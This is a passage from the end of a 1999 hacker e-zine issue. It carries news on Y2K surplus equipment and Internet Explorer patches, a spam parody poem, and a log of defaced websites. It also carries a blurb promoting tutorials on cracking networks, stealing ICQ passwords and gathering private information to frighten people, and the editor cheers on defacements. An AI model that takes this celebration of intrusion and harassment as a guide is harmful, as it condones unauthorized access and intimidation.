agencies that also may be at risk of Year 2000 failures.
"DISA did not notify recipients that equipment may not be Y2K compliant or
provide a disclaimer that equipment was made available without warranty for
fitness of use," the IG report stated. The equipment transferred to law
enforcement agencies included various communications security and cryptologic
devices, radio navigation equipment and electronic countermeasures equipment.
In his response accompanying the report, Marvin Langston, DOD's deputy chief
information officer, said the department agrees with the findings of the IG report
and is changing the its Year 2000 Management Plan to address the disposal of
Year 2000-sensitive equipment. "Because of the potential risk to the general
public, this document also addresses biomedical equipment turned in to the
Defense Reutilization and Marketing Service," Langston said.
However, Rear Adm. E.R. Chamberlin, deputy director of DLA, which
oversees the various DRMS facilities throughout DOD, said the IG report
"exaggerates" the Year 2000 risks associated with excess and surplus
equipment, particularly medical equipment.
"We offer excess and surplus equipment on an 'as is, where is' basis, with no
express or implied warranties for fitness of use," Chamberlin said. "DLA
reviewed medical items [in the categories audited] and only .2 percent were
found to have an embedded chip and none to be date-sensitive," he said.
@HWA
63.0 HATE ON GOVERNMENT WEB SITE
~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Wednesday 29th September 1999 on 8:25 pm CET
A Florida sheriff is using an official government web site to espouse his views on
abortion, school prayer, and the "moral corruption" brought by various social groups
and organizations. Because McDougall's message is posted on a site that is
apparently taxpayer supported, his words have sparked debate about whether the
message constitutes protected free speech or an illegal use of government property
to express personal views. Full story
http://www.zdnet.com/zdtv/cybercrime/news/story/0,3700,2342354,00.html
Sheriff's Opinion: Free
Speech or Illegal Posting?
A Florida law enforcement official
posts message on government site
blasting gays, abortion, and the ACLU.
September 27, 1999
A Florida sheriff is
using an official
government
website to espouse
his views on
abortion, school
prayer, and the "moral corruption" brought
by various social groups and
organizations.
The message, written as a letter by
Sheriff John J. McDougall, is posted on the
Lee County Sheriff's Office website. It
lambastes homosexuals, feminists,
atheists, Planned Parenthood, and the
American Civil Liberties Union, among
others.
Because McDougall's message is posted
on a site that is apparently taxpayer
supported, his words have sparked debate
about whether the message constitutes
protected free speech or an illegal use of
government property to express personal
views. However, there is currently no law
to force McDougall to pull his message
down.
In the letter, McDougall says he strongly
opposes the elimination of Catholic prayer
in public schools. He urges America to
"wake up" and fight against "...the
diabolical forces of moral corruption
working feverishly behind closed doors."
He cites as culprits "the gay and lesbian
coalitions, rabid feminist groups, United
Nations one-world government radicals,
and the American Civil Liberties Union."
In an ironic twist, the ACLU, one of
McDougall's prime targets, is defending his
right to speak-- although the Florida
chapter of the ACLU called McDougall's
viewpoints "disturbing."
For more on this story by CyberCrime
Legal Analyst Luke Reiter, including
excerpts of the message and an interview
with the Florida ACLU, click on the TV
icon above.
@HWA
64.0 MS: JUST KEEP ON PATCHING
~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Wednesday 29th September 1999 on 8:00 pm CET
Microsoft has patched a handful of security holes in its Internet Explorer browser and
ActiveX technology that made computers vulnerable to attack by malicious Web site
operators. The nice folks at Cnet were kind enough to put them together for us one
more time (the last hopefully.. nah :). More info
http://news.cnet.com/news/0-1005-200-360962.html?tag=st.ne.1002.tgif?st.ne.fd.gif.e
Microsoft patches Internet Explorer, ActiveX holes
By Paul Festa
Staff Writer, CNET News.com
September 29, 1999, 4:00 a.m. PT
Microsoft has patched a handful of security holes in its Internet Explorer browser and ActiveX technology that made
computers vulnerable to attack by malicious Web site operators.
The first patch takes care of a problem with IE's ImportExportFavorites feature, which lets users tranfer lists of frequently visited
Web addresses. The bug lets a malicious Web site operator run executable code on the computer of someone who visits that
Web site.
"The net result is that a malicious Web site operator potentially could take any action on the computer that the user would be
capable of taking," Microsoft warned in a security alert earlier this month.
Microsoft's patch eliminates the problem, the company said today. Versions 4.01 and 5.0 of IE are
at risk. The patch also fixes a related problem involving ActiveX, Microsoft's technology for bringing
interactive scripts and controls to Web pages.
ActiveX has long been a security headache for Microsoft. Critics of the technology fault its
"trust-based" security model, in which signatures let users choose whether to download an ActiveX
control. With this system, users are expected to judge that controls signed by well-known
companies like Microsoft are less likely to be maliciously designed than those signed by unknown
entities.
In the latest discovery, Microsoft identified eight ActiveX controls it said were "incorrectly marked as
'safe for scripting,'" a designation that assures users that they can download the controls without
posing any security risk to their own computers. The controls could be manipulated for malicious
ends, however, Microsoft said.
The controls in question are Kodak Image Edit: Wang Imaging; Kodak Image Annotation: Wang Imaging; Kodak Image Scan:
Wang Imaging; Kodak Thumbnail Image: Wang Imaging; Wang Image Admin: Wang Imaging; HHOpen: HTML help files;
Registration Wizard: Internet Explorer Product Registration; and IE Active Setup: Internet Explorer Setup.
Microsoft credited Bulgarian bug hunter Georgi Guninski with discovering the so-called ImportExportFavorites bug. Richard Smith
of Pharlap Software and Australian bug hunter Shane Hird were recognized for discovering the ActiveX problems.
@HWA
-=----------=- -=----------=- -=----------=- -=----------=-
O
0
o
O O O
0
-=----------=- -=----------=- -=----------=- -=----------=- -=----------=-
END of main news articles content... read on for ads, humour, hacked websites etc
-=----------=- -=----------=- -=----------=- -=----------=- -=----------=-
HWA.hax0r.news
AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*****************************************************************************
* *
* ATTRITION.ORG http://www.attrition.org *
* ATTRITION.ORG Advisory Archive, Hacked Page Mirror *
* ATTRITION.ORG DoS Database, Crypto Archive *
* ATTRITION.ORG Sarcasm, Rudeness, and More. *
* *
*****************************************************************************
www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
m www.2600.com ########################################ww.2600.com www.freeke
vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic
k.com www.2600.########################################om www.2600.com www.fre
ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre
<a href="www.2600.com</a">http://www.2600.com/">www.2600.com</a>
<a href="http://www.kevinmitnick.com></a>
+-----------------------------------------------------------------------------+
| SmoG Alert .. http://smog.cjb.net/ NEWS on SCIENCE |
| =================== http://smog.cjb.net/ NEWS on SECURITY |
| NEWS/NEWS/NEWS/NEWS http://smog.cjb.net/ NEWS on THE NET |
| http://smog.cjb.net/ NEWS on TECHNOLOGY |
+-----------------------------------------------------------------------------+
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
<a href="One">http://www.csoft.net">One of our sponsers, visit them now</a> www.csoft.net
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
//////////////////////////////////////////////////////////&
#47;///////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press,usmc.net, put AD! in the subject header please. - Ed //
//////////////////////////////////////////////////////////////////////////////
@HWA
HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~
Don't worry. worry a *lot*
Send in submissions for this section please! ............c'mon, you KNOW you
wanna...yeah you do...make it fresh and new...be famous...<sic>
____ _ _ _ _ _
/ ___| ___ _ __ __| (_)_ __ _ _ ___ _ _ _ __ / \ ___ ___(_|_)
\___ \ / _ \ '_ \ / _` | | '_ \| | | |/ _ \| | | | '__| / _ \ / __|/ __| | |
___) | __/ | | | (_| | | | | | |_| | (_) | |_| | | / ___ \\__ \ (__| | |
|____/ \___|_| |_|\__,_|_|_| |_|\__, |\___/ \__,_|_| /_/ \_\___/\___|_|_|
|___/
/ \ _ __| |_
/ _ \ | '__| __|
/ ___ \| | | |_
/_/ \_\_| \__| TOO, for inclusion in future issues
Do the HWA logo etc and we'll showcase it here to show off your talents...remember
the 80's? dig out those ascii editors and do yer best...
_|
_|_|_| _|_| _|_|_|_|
_| _| _| _| _|
_| _| _| _| _|
_|_|_| _|_| _|_|
_|
_|_|
_| _|_|
_| _|_| _|_| _|_| _|_|_|_| _|
_|_| _| _| _| _| _| _|_|
_| _| _| _| _| _|
_| _|_| _|_| _|_| _|
Subject: Green eggs and spam
From: h-a-v-o-c@v-o-y-a-g-e-r.removedashes.net (Bill Rogers)
Newsgroups: news.admin.net-abuse.email
Wrote something like this a year or so ago but I don't think I ever
had the guts to post it.
Green Eggs and Spam
I love spam.
I'm Spammerman.
Won't you read my email spam?
I will not read your email spam.
Please don't disturb me, Spammerman.
Will you read it in the street?
Don't you think this stock is neat?
Don't you want some kiddie porn
And if you don't, just hit delete?
I will not read it in the street.
You're nuts to think I'll just delete.
Your kiddie porn is sad and sick
I'd like to beat you with a stick!
Your stock is just a sleazy scam
I do not LIKE you, Spammerman.
Will you read it on the beach?
Will you help support Free Speach?
You're in the wrong if you complain.
Murkowski says so, clear and plain.
I will not read it on the beach.
And by the way, it's spelled Free Speech
My email's packed with worthless stuff
And still you think there's not enough!
Just go to hell, that's what to do,
And take that hack Murkowski too!
I'll never read your email spam.
It's wrong and evil, Spammerman!
Will you buy my book that's next
About the secrets of male sex?
Or buy a set of plans from me
To steal your cable shows for free?
I will not buy that book from you
For I've no need.. perhaps YOU do!
I will not steal my cable shows.
Perhaps I could, but you should know
That I am HONEST, Spammerman.
That's something you can't understand.
Will you please Make Money Fast?
just send your money to the last
Address upon this list of four.
And what are you all hostile for?
I've this Remove List that I share.
It's worse than useless, but it's there!
I won't fall for Make Money Fast
So you can ram it up your rectal cavity,
And please don't think my wits are failing
At this twelve thousandth "one time mailing,"
That I'd get on a "remove list"
That makes spam grow and not desist.
But give your real address to me
And we shall see what we shall see.
Oh goody! Send your unmarked bills
My bedroom's in Suburban Hills
But if there's noise you'll start a fight.
My mom works on the streets at night
And Dad is sleeping off his wine.
So tell the postman "Choose your time,
And leave the cash in silent stealth."
Oh good! I've finally made some wealth!
Hey, Spammerman! I've found your place.
It's good to see your zit-pocked face
I'd like to tell you that I still
Don't read your spam and never will.
I will not read, I will not buy,
I think that those who spam should die!
So NEVER spam me any more.
The end. That's what I came here for.
Oh, who are all these other friends?
Well, just to help you make amends
For all the spamming that you've done,
I've brought your ISP, for one,
To cancel your account for you
And maybe break your kneecaps, too!
And here are Agents One and Two
Of FBI, to talk to you
About the kiddie porno laws
And when they're done, without a pause
The Post Inspection Service here
Would like to make it plainly clear
"Make Money Fast" is not legit
No matter what you claim for it.
And since it's chilly where you are
Ten thousand Netizens brought tar
And warming feathers, and a rail
To give you a free ride to jail.
So have a happy, spammy day!
And with these words, he walked away.
------- End of forwarded message -------
@HWA
SITE.1
#1
http://blacksun.box.sk.
The Black Sun
~~~~~~~~~~~~~
Raven sent in this url for his site which kicks some major ass, check it out for good
texts on begining hacking and just generally how a web site should look. Nicely done
html with a webboard and good selection of texts.
Here's a list straight from the tutorials page;
Tutorials
Finished Tutorials
Networking and it's security-related issues
* FTP Tutorial (version 2.1) - covers FTP hacking, FTP commands, what the hell is FTP and tons of tips and tricks (not all
FTP-related) in the newbies corner.
* RM Networks Tutorial (version 1.22) - yes, RM Networks. You know, those local networks, not Internet networks... RM
Networks are so stupid that they rely on the fact that the user is even dumber. Stumbled across one in your
school/University/college/working place? Want maximum priviledges on it? Then try this tutorial.
* Ad Blocking Tutorial (version 1.8) - are you tired of seeing stupid commercials and popups popping on your screen and chewing
up your bandwidth? Then read this!
* Sendmail Tutorial (version 2.1) - find out why Sendmail is called 'the buggiest daemon on earth', and find out what a daemon is
anyway. Tons of ways to crack into big computers as well as PCs unleashed, including, of course, information on how to block
these holes.
* Anonymity Tutorial (version 1.2) - tired of people getting your IP over ICQ or IRC? Tired of website owners knowing
EVERYTHING about you? Tired of people tracing you by your Email address? Read this one and learn how to anonymize
yourself!
* Proxy/WinGate/SOCKS Tutorial (version 1.0) - don't know what a Proxy is? Don't know what a WinGate is? Don't know what
a SOCKS firewall is? Wanna learn how to increase your anonymity using them? Then read this one.
* Info Gathering Tutorial (version 1.3) - want to find private information about people and scare them like hell? Then read this
tutorial, you'll just love it!
* ICQ Security (version 1.0) - learn about ICQ's security flaws, how to exploit them and how to protect yourself from malicious
users who use these flaws against you. Stealing passwords, reading someone's entire hard drive, flooding, spoofing, DoSsing and
what not.
IRC-related issues
* IRC Warfare Tutorial (version 1.0) - ever wanted to know how those lamers keep taking over your channel and/or kicking you
off IRC? Learn to protect yourself here!
* Eggdrop Bots Tutorial (coming soon in a few days) - learn how to set up your own Eggdrop bots on IRC, and how to send
them commands, make them execute automated processes or commands on certain conditions or time etc'.
Local stuff
* Overclocking Tutorial (version 1.6) - tired of your old CPU? Your outdated 3D accelerator? Your X-type hardware? Then do
some overclocking! Get more speed from your hardware for free! This tutorial covers overclocking plus lots of explanations about
various pieces of hardware like the CMOS chip, the Cache chip, your RAM, BUS connections etc'.
* Windows Registry Tutorial (version 1.0) - learn more about the Windows registry. How does it work, what does it do and what
happened to the old .ini files?
* Standalone Security (this tutorials wasn't written by a BSRF member. Read about what exactly happened here).
* Interesting Things You Didn't Know About Your Computer's Hardware (version 1.0) - read Njan's amazing tutorial about all
those things you always wanted to know about PC hardware but never had the guts to ask.
Phreaking
* Phreaking Tutorial (version 1.0) - this should get all those newbie phreakers out there started. An excellent tutorial by Squiler, the
only phreaker aboard BSRF.
* Advanced Phreaking Tutorial (version 1.1) - already finished Squiler's phreaking tutorial? Want more? Then this one is for you!
More phreaking information and techniques, with some more advanced stuff than the previous one.
* The Ultimate Phreaking Tutorial II (version 1.0) - liked Squiler's first phreaking tutorial? Want more? Then read this one!
Cracking
* Cracking, Part I (version 1.0) - learn how to crack programs by yourself, and what the hell cracking means anyway.
Upcoming Tutorials
* DoS Attacks Tutorial - learn how DoS attacks work and how to protect yourself against them.
* Eggdrop Bots - learn how Eggdrop bots work and how to set up your own bot.
* PGP Tutorial - learn how PGP works behind the scenes and how to use it.
* The POP Protocol - wanna learn more on how Email works? Wanna delete spam and mailbombs on the server, without even
having to download them and fill your entire inbox? Then read this one once it gets out.
* Cracking, Part II + III - the continuation of Techlord's first cracking tutorial.
Translated Tutorials
Overclocking Tutorial (Lithuanian version) - by Saint.
#2
http://members.xoom.com/jcenters/HADL.html
The Hackers Anti-Defamation league
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Here's a site that most people should be aware of and try and visit, its a good way of getting
your feelings across if nothing else...
From the site, almost verbatim;
The Hacker Anti-Defamation League
Since the early 80's, the press has used the term "hacker" to mean a malicious security breaker,
someone who likes to break into computer systems for fun. This is not a
hacker at all. This is in fact a cracker.
Hackers rather, are people who like to break out of boundaries and find solutions to problems.
Hackers not only exist in the software community, they are musicians, engineers, artists. You can
find hackers in almost any field. Here, we discuss mainly the software hacker: a person who enjoys
programming and exploring computers.
Hackers are the people who built the internet. They created Unix. They made the world wide web work.
Without the work of hackers you wouldn't be viewing this page today, and I wouldn't have written it.
The modern world owes a lot to hackers.
As a matter of fact, here are the definitions of hacker and cracker as defined by RFC 1983:
cracker
A cracker is an individual who attempts to access computer systems without authorization. These
individuals are often malicious, as opposed to hackers, and have many means at their disposal for
breaking into a system. See also: hacker, Computer Emergency Response Team, Trojan Horse, virus,
worm.
hacker
A person who delights in having an intimate understanding of the internal workings of a system,
computers and computer networks in particular. The term is often misused in a pejorative context,
where "cracker" would be the correct term. See also: cracker.
<snip>
You can Send in submissions for this section too if you've found (or RUN) a cool site...
@HWA
H.W Hacked websites
~~~~~~~~~~~~~~~~
Note: The hacked site reports stay, especially with some cool hits by
groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed
* Hackers Against Racist Propaganda (See issue #7)
Haven't heard from Catharsys in a while for those following their saga visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...
Hacker groups breakdown is available at Attrition.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
check out http://www.attrition.org/mirror/attrition/groups.html to see who
you are up against. You can often gather intel from IRC as many of these
groups maintain a presence by having a channel with their group name as the
channel name, others aren't so obvious but do exist.
[9/20/99]
Defaced: http://www.adrian.edu/
By: bl0w team
Mirror:
http://www.attrition.org/mirror/attrition/1999/09/20/www.adrian.edu
OS: NT
[9/20/99]
Defaced: http://www.empirehonda.com/
By: ytcråcker/s0n
Mirror:
http://www.attrition.org/mirror/attrition/1999/09/20/www.empirehonda.com
OS: NT
[9/20/99]
Defaced: http://titans.khs.keansburg.k12.nj.us/
By: z0mba
Mirror:
http://www.attrition.org/mirror/attrition/1999/09/20/titans.khs.keansburg.k12.nj.us
OS: Solaris
[9/20/99]
Defaced: http://www.euromicron.com/
By: HIT2000
Mirror:
http://www.attrition.org/mirror/attrition/1999/09/20/www.euromicron.com
OS: NT
[9/20/99]
Defaced: http://www.g0ddess.com/
By: Unknown
Mirror:
http://www.attrition.org/mirror/attrition/1999/09/20/www.g0ddess.com
OS: FreeBSD
Note: The defacement consists of a comment within the HTML of the mirror
[99.09.24] NT [HIT2000] Comavenir (www.comavenir.com)
[99.09.24] NT [eternal] King Sport Connection (www.kingsportconnection.org)
[99.09.24] Ir [ ] Arizona Libertarian Party (www.lpaz.org)
The 'lpaz' hack is interesting. No elite speak, no cussing. A seemingly
true political hack.
[9/24/99]
defaced: www.iphone.com
by: (unknown)
mirror:
http://www.attrition.org/mirror/attrition/1999/09/24/www.iphone.com/
note: a targeted hack. message is relevant to the domain defaced.
[99.09.25] NT [fEAR-mE] Thesaurus (www.thesaurus.net)
[99.09.25] Li [TREATY] FIS Gov (BO) (beta.fis.gov.bo)
[99.09.25] So [^CrackPyrate] NKFU Edu (TW) (ccms.nkfu.edu.tw)
[99.09.25] So [mistuh clean] MediaCity (SG) (pi.mediacity.com.sg)
[99.09.25] NT [HIT2000] France Commerce (www.franceecommerce.com)
[99.09.25] So [weLLfaRe] Plastic Politics (www.plasticpolitics.com)
[99.09.26] So [TREATY] M Carelba (IT) (carelba.it)
[99.09.26] Li [Pakistan HC] Emerald Systems (www.emeraldsystems.com)
[99.09.26] NT [139_r00ted] #2 Hoffman Bikes (www.hoffmanbikes.com)
[99.09.26] NT [139_r00ted] Surweb (www.surweb.org)
[99.09.26] NT [Forro Mob] Uniflex (BR) (www.uniflex.com.br)
[99.09.26] BI [FOaM] M Xtreme Webs (www.xtremewebs.com)
[99.09.28] NT [ytcracker] Altamira International Bank (www.altabank.com)
[99.09.28] NT [ytcracker] Fun Caribbean (www.funcaribbean.com)
[99.09.28] NT [Narcissus] M K Mount Gay (www.mountgay.com)
[99.09.28] NT [HIT2000] Le Monde Pub (www.mondepub.fr)
[99.09.28] NT [induce] Trkiye'nin bir numarali televizyon kanali (www.atv.com.tr)
[99.09.28] NT [fEAR-mE] BT USA (www.btusa.com)
[99.09.28] NT [ ] #4 Hoffman Bikes (www.hoffmanbikes.com)
[99.09.30] BI [Mister-X] DeltaNet (www2.deltanet.com)
[99.09.30] NT [GOD] Crockett County School District (www.technology.crockett.k12.tn.us)
[99.09.30] HP [hV2k] #2 Geofluids Engineering Lab, Seoul National University (petro.snu.ac.kr)
[99.09.30] So [mistuh clean] Web Yes Singapore (singapore.webyes.com)
[99.09.30] Li [ ] Suid Root (www.suidroot.org)
[99.09.30] NT [139_r00ted] PanAmSat Corporation (www.panamsat.com)
[9/28/99]
Defaced: http://www.mondepub.fr/
By: HIT2000
Mirror: http://www.attrition.org/mirror/attrition/1999/09/28/www.mondepub.fr
OS: NT
[9/28/99]
Defaced: http://www.atv.com.tr
By: induce
Mirror: http://www.attrition.org/mirror/attrition/1999/09/28/www.atv.com.tr
OS: NT
and more sites at the attrition cracked web sites mirror:
http://www.attrition.org/mirror/attrition/index.html
-------------------------------------------------------------------------
A.0 APPENDICES
_________________________________________________________________________
A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The links are no longer maintained in this file, there is now a
links section on the http://welcome.to/HWA.hax0r.news/ url so check
there for current links etc.
The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html
New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/
HWA.hax0r.news Mirror Sites around the world:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.sysbreakers.com/hwa ** NEW **
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW **
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.*DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwa.hax0r.news.8m.com/
http://www.fortunecity.com/skyscraper/feature/103/
International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~
Foreign correspondants and others please send in news site links that
have security news from foreign countries for inclusion in this list
thanks... - Ed
Belgium.......: http://bewoner.dma.be/cum/
Brasil........: http://www.psynet.net/ka0z
http://www.elementais.cjb.net
Canada .......: http://www.hackcanada.com
Columbia......: http://www.cascabel.8m.com
http://www.intrusos.cjb.net
Finland ........http://hackunlimited.com/
Germany ........http://www.alldas.de/
http://www.security-news.com/
Indonesia.....: http://www.k-elektronik.org/index2.html
http://members.xoom.com/neblonica/
http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com
South Africa ...http://www.hackers.co.za
http://www.hack.co.za
http://www.posthuman.za.net
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.
.za (South Africa) sites contributed by wyzwun tnx guy...
Got a link for this section? email it to hwa@press.usmc.net and i'll
review it and post it here if it merits it.
@HWA
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
© 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]